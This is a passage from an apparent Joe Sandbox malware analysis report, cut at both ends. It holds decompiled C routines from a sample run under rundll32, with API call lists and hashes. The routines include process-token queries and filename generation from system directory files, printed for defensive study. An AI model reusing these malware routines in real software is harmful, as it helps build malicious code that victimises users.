                                          					memcpy(_t12, _v0, _t13);
                                          					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
                                          				}
                                          				return _t12;
                                          			}








                                          APIs
                                          • lstrlen.KERNEL32(S:(M,00000000,7748D3B0,?,06779AA8,00000000,00000005,0677D00C,00000008,?,?,59935A40,?,?,59935A40), ref: 0677A2F8
                                          • memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,06774A8B,?,?,?,4D283A53,?,?), ref: 0677A31B
                                          • memset.NTDLL ref: 0677A32A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpymemset
                                          • String ID: S:(M
                                          • API String ID: 4042389641-2217774225
                                          • Opcode ID: 8670ce4207e478c3a94cbffda1e3fd1a82724808aba316c7df5ea9085b5a63c8
                                          • Instruction ID: 652f4ae82e2333af8b75fe878774b8333d3db0c501f437a34e971ae8af149c3b
                                          • Opcode Fuzzy Hash: 8670ce4207e478c3a94cbffda1e3fd1a82724808aba316c7df5ea9085b5a63c8
                                          • Instruction Fuzzy Hash: B4E0E5B3A052116BDA70AAB85C8CD4F2A9DDBD8260B000435FA15C3204E630CC04C6B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E06774C3A(void** __esi) {
                                          				char* _v0;
                                          				intOrPtr _t4;
                                          				intOrPtr _t6;
                                          				void* _t8;
                                          				intOrPtr _t11;
                                          				void* _t12;
                                          				void** _t14;
                                          
                                          				_t14 = __esi;
                                          				_t4 =  *0x677d324; // 0x6c495b0
                                          				__imp__(_t4 + 0x40);
                                          				while(1) {
                                          					_t6 =  *0x677d324; // 0x6c495b0
                                          					_t1 = _t6 + 0x58; // 0x0
                                          					if( *_t1 == 0) {
                                          						break;
                                          					}
                                          					Sleep(0xa);
                                          				}
                                          				_t8 =  *_t14;
                                          				if(_t8 != 0 && _t8 != 0x677d030) {
                                          					HeapFree( *0x677d238, 0, _t8);
                                          				}
                                          				_t14[1] = E06777C75(_v0, _t14);
                                          				_t11 =  *0x677d324; // 0x6c495b0
                                          				_t12 = _t11 + 0x40;
                                          				__imp__(_t12);
                                          				return _t12;
                                          			}











                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(06C49570), ref: 06774C43
                                          • Sleep.KERNEL32(0000000A,?,?,?,06774A8B,?,?,?,4D283A53,?,?), ref: 06774C4D
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,06774A8B,?,?,?,4D283A53,?,?), ref: 06774C75
                                          • RtlLeaveCriticalSection.NTDLL(06C49570), ref: 06774C91
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: cd37524cecd69a4e5906c9bbe0ae8bfeddb5aaadb78a2281c242c3b894343def
                                          • Instruction ID: 317cdc7b6bb66dd8430aa87a524584276364e6dd722b4501b0ff9fd3e80bbd36
                                          • Opcode Fuzzy Hash: cd37524cecd69a4e5906c9bbe0ae8bfeddb5aaadb78a2281c242c3b894343def
                                          • Instruction Fuzzy Hash: F0F012B0A10240DFEB65DF78DE48F2977EAAF28745B04C514F702D7258D720E845CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E067778AD() {
                                          				void* _t1;
                                          				intOrPtr _t5;
                                          				void* _t6;
                                          				void* _t7;
                                          				void* _t11;
                                          
                                          				_t1 =  *0x677d26c; // 0x3d0
                                          				if(_t1 == 0) {
                                          					L8:
                                          					return 0;
                                          				}
                                          				SetEvent(_t1);
                                          				_t11 = 0x7fffffff;
                                          				while(1) {
                                          					SleepEx(0x64, 1);
                                          					_t5 =  *0x677d2b8; // 0x0
                                          					if(_t5 == 0) {
                                          						break;
                                          					}
                                          					_t11 = _t11 - 0x64;
                                          					if(_t11 > 0) {
                                          						continue;
                                          					}
                                          					break;
                                          				}
                                          				_t6 =  *0x677d26c; // 0x3d0
                                          				if(_t6 != 0) {
                                          					CloseHandle(_t6);
                                          				}
                                          				_t7 =  *0x677d238; // 0x6850000
                                          				if(_t7 != 0) {
                                          					HeapDestroy(_t7);
                                          				}
                                          				goto L8;
                                          			}









                                          APIs
                                          • SetEvent.KERNEL32(000003D0,00000001,06776F2D), ref: 067778B8
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 067778C7
                                          • CloseHandle.KERNEL32(000003D0), ref: 067778E8
                                          • HeapDestroy.KERNEL32(06850000), ref: 067778F8
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: CloseDestroyEventHandleHeapSleep
                                          • String ID:
                                          • API String ID: 4109453060-0
                                          • Opcode ID: b22735beb9107aa645d27f51631457aeea0a6e4c23709c139d1d2ef7057552a1
                                          • Instruction ID: 48817e568294317869e35d0e85e737232c9c912b3d87e1b31024150329a06d14
                                          • Opcode Fuzzy Hash: b22735beb9107aa645d27f51631457aeea0a6e4c23709c139d1d2ef7057552a1
                                          • Instruction Fuzzy Hash: CCF065B1F113119BDF659B75DD48F167B9BAF09651B148511BE00D7288DF70C401D6B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E06779B10() {
                                          				void* _v0;
                                          				void** _t3;
                                          				void** _t5;
                                          				void** _t7;
                                          				void** _t8;
                                          				void* _t10;
                                          
                                          				_t3 =  *0x677d324; // 0x6c495b0
                                          				__imp__( &(_t3[0x10]));
                                          				while(1) {
                                          					_t5 =  *0x677d324; // 0x6c495b0
                                          					_t1 =  &(_t5[0x16]); // 0x0
                                          					if( *_t1 == 0) {
                                          						break;
                                          					}
                                          					Sleep(0xa);
                                          				}
                                          				_t7 =  *0x677d324; // 0x6c495b0
                                          				_t10 =  *_t7;
                                          				if(_t10 != 0 && _t10 != 0x677e845) {
                                          					HeapFree( *0x677d238, 0, _t10);
                                          					_t7 =  *0x677d324; // 0x6c495b0
                                          				}
                                          				 *_t7 = _v0;
                                          				_t8 =  &(_t7[0x10]);
                                          				__imp__(_t8);
                                          				return _t8;
                                          			}










                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(06C49570), ref: 06779B19
                                          • Sleep.KERNEL32(0000000A,?,?,?,06774A8B,?,?,?,4D283A53,?,?), ref: 06779B23
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,06774A8B,?,?,?,4D283A53,?,?), ref: 06779B51
                                          • RtlLeaveCriticalSection.NTDLL(06C49570), ref: 06779B66
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 2a5471113ce629e62a11e4837c4605b01aa2f09fe27e5463e903328935c0ad5b
                                          • Instruction ID: 14055549a2cffcccbb4074f00df359468a75c3de151cbc9cc13935db87a7e71b
                                          • Opcode Fuzzy Hash: 2a5471113ce629e62a11e4837c4605b01aa2f09fe27e5463e903328935c0ad5b
                                          • Instruction Fuzzy Hash: 17F0D4B4A11200DFEB69CF64EE59E2937E6EF18300B048018EB02C7268D630BC40CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E06776B6E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                          				intOrPtr* _v8;
                                          				void* _t17;
                                          				intOrPtr* _t22;
                                          				void* _t27;
                                          				char* _t30;
                                          				void* _t33;
                                          				void* _t34;
                                          				void* _t36;
                                          				void* _t37;
                                          				void* _t39;
                                          				int _t42;
                                          
                                          				_t17 = __eax;
                                          				_t37 = 0;
                                          				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                          				_t2 = _t17 + 1; // 0x1
                                          				_t28 = _t2;
                                          				_t34 = E067758BE(_t2);
                                          				if(_t34 != 0) {
                                          					_t30 = E067758BE(_t28);
                                          					if(_t30 == 0) {
                                          						E0677147E(_t34);
                                          					} else {
                                          						_t39 = _a4;
                                          						_t22 = E0677A8D2(_t39);
                                          						_v8 = _t22;
                                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                          							_a4 = _t39;
                                          						} else {
                                          							_t26 = _t22 + 2;
                                          							_a4 = _t22 + 2;
                                          							_t22 = E0677A8D2(_t26);
                                          							_v8 = _t22;
                                          						}
                                          						if(_t22 == 0) {
                                          							__imp__(_t34, _a4);
                                          							 *_t30 = 0x2f;
                                          							 *((char*)(_t30 + 1)) = 0;
                                          						} else {
                                          							_t42 = _t22 - _a4;
                                          							memcpy(_t34, _a4, _t42);
                                          							 *((char*)(_t34 + _t42)) = 0;
                                          							__imp__(_t30, _v8);
                                          						}
                                          						 *_a8 = _t34;
                                          						_t37 = 1;
                                          						 *_a12 = _t30;
                                          					}
                                          				}
                                          				return _t37;
                                          			}















                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,0677A006,?,?,?,?,00000102,067766AF,?,?,00000000), ref: 06776B7A
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                            • Part of subcall function 0677A8D2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,06776BA8,00000000,00000001,00000001,?,?,0677A006,?,?,?,?,00000102), ref: 0677A8E0
                                            • Part of subcall function 0677A8D2: StrChrA.SHLWAPI(?,0000003F,?,?,0677A006,?,?,?,?,00000102,067766AF,?,?,00000000,00000000), ref: 0677A8EA
                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0677A006,?,?,?,?,00000102,067766AF,?), ref: 06776BD8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 06776BE8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 06776BF4
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3767559652-0
                                          • Opcode ID: ed3a30beb3c8c3da46313396c84f4df9fc6b03c555627b8fd6992c190a2f5f92
                                          • Instruction ID: 054026c23f8a31eca969d5baf76f2fbcc353ec73d906934af4c08c481dfa53f4
                                          • Opcode Fuzzy Hash: ed3a30beb3c8c3da46313396c84f4df9fc6b03c555627b8fd6992c190a2f5f92
                                          • Instruction Fuzzy Hash: 9921B1B2904655FFDF925FB4CD88AAE7FA9EF0A280B158154FA049B215DB31DA00C7E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E06775FCB(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                          				void* _v8;
                                          				void* _t18;
                                          				int _t25;
                                          				int _t29;
                                          				int _t34;
                                          
                                          				_t29 = lstrlenW(_a4);
                                          				_t25 = lstrlenW(_a8);
                                          				_t18 = E067758BE(_t25 + _t29 + _t25 + _t29 + 2);
                                          				_v8 = _t18;
                                          				if(_t18 != 0) {
                                          					_t34 = _t29 + _t29;
                                          					memcpy(_t18, _a4, _t34);
                                          					_t10 = _t25 + 2; // 0x2
                                          					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                          				}
                                          				return _v8;
                                          			}









                                          APIs
                                          • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,06C4937C,?,0677694E,004F0053,06C4937C,?,?,?,?,?,?,06779C10), ref: 06775FDB
                                          • lstrlenW.KERNEL32(0677694E,?,0677694E,004F0053,06C4937C,?,?,?,?,?,?,06779C10), ref: 06775FE2
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                          • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,0677694E,004F0053,06C4937C,?,?,?,?,?,?,06779C10), ref: 06776002
                                          • memcpy.NTDLL(751469A0,0677694E,00000002,00000000,004F0053,751469A0,?,?,0677694E,004F0053,06C4937C), ref: 06776015
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpy$AllocateHeap
                                          • String ID:
                                          • API String ID: 2411391700-0
                                          • Opcode ID: 20405d42814908a05dbb776cef9455ef357c452eb58a439ea265dbde4a4a2a24
                                          • Instruction ID: 0d72699940d8d43931cab160f65caff279affaece02bfbc0b8ced8c0a1cbfbf0
                                          • Opcode Fuzzy Hash: 20405d42814908a05dbb776cef9455ef357c452eb58a439ea265dbde4a4a2a24
                                          • Instruction Fuzzy Hash: 47F04972900119BB8F51EFA8CC89CDF7BACEF092947054066EA04D7215EB31EA10DBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?,00000000,00000000,06775335,616D692F,00000000), ref: 06779DFB
                                          • lstrlen.KERNEL32(?), ref: 06779E03
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                          • lstrcpy.KERNEL32(00000000,?), ref: 06779E1A
                                          • lstrcat.KERNEL32(00000000,?), ref: 06779E25
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                          • String ID:
                                          • API String ID: 74227042-0
                                          • Opcode ID: 7c112e62901b311b6b287566cab67e07ea88fe7a5d11bb38b70da1de12cce771
                                          • Instruction ID: 62a59d0e9b6b26f3925658ad27cd2ed223eab20e4ad214b0aeaf92a2d2839790
                                          • Opcode Fuzzy Hash: 7c112e62901b311b6b287566cab67e07ea88fe7a5d11bb38b70da1de12cce771
                                          • Instruction Fuzzy Hash: C4E01273815621AF8B626BA4AC08C9FBBAAFF8D250705891AF750D3118CB31C815CBD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          Control-flow Graph

                                          C-Code - Quality: 93%
                                          			E04FD32BA(signed char* __eax, intOrPtr* _a4) {
                                          				signed int _v12;
                                          				void* _v16;
                                          				CHAR* _v20;
                                          				struct _FILETIME _v28;
                                          				void* _v32;
                                          				void* _v36;
                                          				char* _v40;
                                          				signed int _v44;
                                          				long _v344;
                                          				struct _WIN32_FIND_DATAA _v368;
                                          				signed int _t72;
                                          				void* _t74;
                                          				signed int _t76;
                                          				void* _t78;
                                          				intOrPtr _t81;
                                          				CHAR* _t83;
                                          				void* _t85;
                                          				signed char _t89;
                                          				signed char _t91;
                                          				intOrPtr _t93;
                                          				void* _t96;
                                          				long _t99;
                                          				int _t101;
                                          				signed int _t109;
                                          				char* _t111;
                                          				void* _t113;
                                          				int _t119;
                                          				char _t128;
                                          				void* _t134;
                                          				signed int _t136;
                                          				char* _t139;
                                          				signed int _t140;
                                          				char* _t141;
                                          				char* _t146;
                                          				signed char* _t148;
                                          				int _t151;
                                          				void* _t152;
                                          				void* _t153;
                                          				void* _t154;
                                          				void* _t165;
                                          
                                          				_v12 = _v12 & 0x00000000;
                                          				_t148 = __eax;
                                          				_t72 =  *0x4fdd2a0; // 0x59935a40
                                          				_t74 = RtlAllocateHeap( *0x4fdd238, 0, _t72 ^ 0x59935b44);
                                          				_v20 = _t74;
                                          				if(_t74 == 0) {
                                          					L36:
                                          					return _v12;
                                          				}
                                          				_t76 =  *0x4fdd2a0; // 0x59935a40
                                          				_t78 = RtlAllocateHeap( *0x4fdd238, 0, _t76 ^ 0x59935a4d);
                                          				_t146 = 0;
                                          				_v36 = _t78;
                                          				if(_t78 == 0) {
                                          					L35:
                                          					HeapFree( *0x4fdd238, _t146, _v20);
                                          					goto L36;
                                          				}
                                          				_t136 =  *0x4fdd2a0; // 0x59935a40
                                          				memset(_t78, 0, _t136 ^ 0x59935a4d);
                                          				_t81 =  *0x4fdd2a4; // 0x254a5a8
                                          				_t154 = _t153 + 0xc;
                                          				_t5 = _t81 + 0x4fde7e8; // 0x73797325
                                          				_t83 = E04FD77E6(_t5);
                                          				_v20 = _t83;
                                          				if(_t83 == 0) {
                                          					L34:
                                          					HeapFree( *0x4fdd238, _t146, _v36);
                                          					goto L35;
                                          				}
                                          				_t134 = 0xffffffffffffffff;
                                          				_v28.dwLowDateTime = 0x59935a4d;
                                          				_v28.dwHighDateTime = 0x59935a4d;
                                          				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                          				_v32 = _t85;
                                          				if(_t85 != 0x59935a4d) {
                                          					GetFileTime(_t85,  &_v28, 0, 0);
                                          					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                          					asm("adc dword [ebp-0x14], 0xc9"); // executed
                                          					FindCloseChangeNotification(_v32); // executed
                                          				}
                                          				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                          				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                          				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                          				 *_t148 = _t91;
                                          				_v32 = _t91 & 0x000000ff;
                                          				_t93 =  *0x4fdd2a4; // 0x254a5a8
                                          				_t16 = _t93 + 0x4fde809; // 0x642e2a5c
                                          				_v40 = _t146;
                                          				_v44 = _t89 & 0x000000ff;
                                          				__imp__(_v20, _t16);
                                          				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                                          				_v16 = _t96;
                                          				if(_t96 == _t134) {
                                          					_t146 = 0;
                                          					goto L34;
                                          				}
                                          				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                          				while(_t99 > 0) {
                                          					_t101 = FindNextFileA(_v16,  &_v368); // executed
                                          					if(_t101 == 0) {
                                          						FindClose(_v16);
                                          						_v16 = FindFirstFileA(_v20,  &_v368);
                                          						_v28.dwHighDateTime = _v344;
                                          						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                                          					}
                                          					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                          				}
                                          				_v12 = _v12 & 0x00000000;
                                          				while(1) {
                                          					_t109 = _v44;
                                          					if(_v12 <= _t109) {
                                          						goto L15;
                                          					}
                                          					_t140 = _v12;
                                          					if(_t140 > _v32) {
                                          						_t141 = _v36;
                                          						 *_a4 = _t141;
                                          						while(1) {
                                          							_t128 =  *_t141;
                                          							if(_t128 == 0) {
                                          								break;
                                          							}
                                          							if(_t128 < 0x30) {
                                          								 *_t141 = _t128 + 0x20;
                                          							}
                                          							_t141 = _t141 + 1;
                                          						}
                                          						_v12 = 1;
                                          						FindClose(_v16); // executed
                                          						_t146 = 0;
                                          						goto L35;
                                          					}
                                          					_t165 = _t140 - _t109;
                                          					L15:
                                          					if(_t165 == 0 || _v12 == _v32) {
                                          						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                                          						_t139 = _v40;
                                          						_t151 = _t111 -  &(_v368.cFileName);
                                          						_t113 = 0;
                                          						if(_t139 != 0) {
                                          							_t48 = _t151 - 4; // -4
                                          							_t113 = _t48;
                                          							if(_t113 > _t151) {
                                          								_t113 = 0;
                                          							}
                                          						}
                                          						if(_t151 > 4) {
                                          							_t151 = 4;
                                          						}
                                          						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                                          						_t154 = _t154 + 0xc;
                                          						_v40 =  &(_v40[_t151]);
                                          					}
                                          					do {
                                          						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                          						if(_t119 == 0) {
                                          							FindClose(_v16);
                                          							_v16 = FindFirstFileA(_v20,  &_v368);
                                          						}
                                          					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                          					_v12 = _v12 + 1;
                                          				}
                                          			}


                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 04FD32E5
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 04FD3307
                                          • memset.NTDLL ref: 04FD3321
                                            • Part of subcall function 04FD77E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,04FD333A,73797325), ref: 04FD77F7
                                            • Part of subcall function 04FD77E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04FD7811
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04FD335F
                                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04FD3373
                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 04FD338A
                                          • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04FD3396
                                          • lstrcat.KERNEL32(?,642E2A5C), ref: 04FD33D7
                                          • FindFirstFileA.KERNEL32(?,?), ref: 04FD33ED
                                          • CompareFileTime.KERNEL32(?,?), ref: 04FD340B
                                          • FindNextFileA.KERNELBASE(04FD207E,?), ref: 04FD341F
                                          • FindClose.KERNEL32(04FD207E), ref: 04FD342C
                                          • FindFirstFileA.KERNEL32(?,?), ref: 04FD3438
                                          • CompareFileTime.KERNEL32(?,?), ref: 04FD345A
                                          • StrChrA.SHLWAPI(?,0000002E), ref: 04FD348D
                                          • memcpy.NTDLL(00000000,?,00000000), ref: 04FD34C6
                                          • FindNextFileA.KERNELBASE(04FD207E,?), ref: 04FD34DB
                                          • FindClose.KERNEL32(04FD207E), ref: 04FD34E8
                                          • FindFirstFileA.KERNEL32(?,?), ref: 04FD34F4
                                          • CompareFileTime.KERNEL32(?,?), ref: 04FD3504
                                          • FindClose.KERNEL32(04FD207E), ref: 04FD3539
                                          • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 04FD354B
                                          • HeapFree.KERNEL32(00000000,?), ref: 04FD355B
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                          • String ID:
                                          • API String ID: 2944988578-0
                                          • Opcode ID: e820ba349f9420ae21aeaf0dc7bad25fbd2562855d070c97ac85981afb477ed9
                                          • Instruction ID: c532adf012bf3af205c69641b3d9c462a90447ba18ef9a6d969cccf0d16e474f
                                          • Opcode Fuzzy Hash: e820ba349f9420ae21aeaf0dc7bad25fbd2562855d070c97ac85981afb477ed9
                                          • Instruction Fuzzy Hash: 4C814D72D00119AFDF11DFA4DC88AEEBBBAFF44300F144169EA05E7250D739AA45CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 38%
                                          			E04FD71B9(char _a4, void* _a8) {
                                          				void* _v8;
                                          				void* _v12;
                                          				char _v16;
                                          				void* _v20;
                                          				char _v24;
                                          				char _v28;
                                          				char _v32;
                                          				char _v36;
                                          				char _v40;
                                          				void* _v44;
                                          				void** _t33;
                                          				void* _t40;
                                          				void* _t43;
                                          				void** _t44;
                                          				intOrPtr* _t47;
                                          				char _t48;
                                          
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v20 = _a4;
                                          				_t48 = 0;
                                          				_v16 = 0;
                                          				_a4 = 0;
                                          				_v44 = 0x18;
                                          				_v40 = 0;
                                          				_v32 = 0;
                                          				_v36 = 0;
                                          				_v28 = 0;
                                          				_v24 = 0;
                                          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                          					_t33 =  &_v8;
                                          					__imp__(_v12, 8, _t33);
                                          					if(_t33 >= 0) {
                                          						_t47 = __imp__;
                                          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                          						_t44 = E04FD58BE(_a4);
                                          						if(_t44 != 0) {
                                          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                          							if(_t40 >= 0) {
                                          								memcpy(_a8,  *_t44, 0x1c);
                                          								_t48 = 1;
                                          							}
                                          							E04FD147E(_t44);
                                          						}
                                          						NtClose(_v8); // executed
                                          					}
                                          					NtClose(_v12);
                                          				}
                                          				return _t48;
                                          			}


                                          APIs
                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04FD7200
                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04FD7213
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04FD722F
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04FD724C
                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 04FD7259
                                          • NtClose.NTDLL(?), ref: 04FD726B
                                          • NtClose.NTDLL(00000000), ref: 04FD7275
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 2575439697-0
                                          • Opcode ID: d7e1c58278dea2b7ada66a3cd207634ef08de1f89917bf4eee8a3f8e05f57bdf
                                          • Instruction ID: c985c5d9120cbc031884eeb2c0c14c902d5a55b0e443f27eb490c770ef95ce68
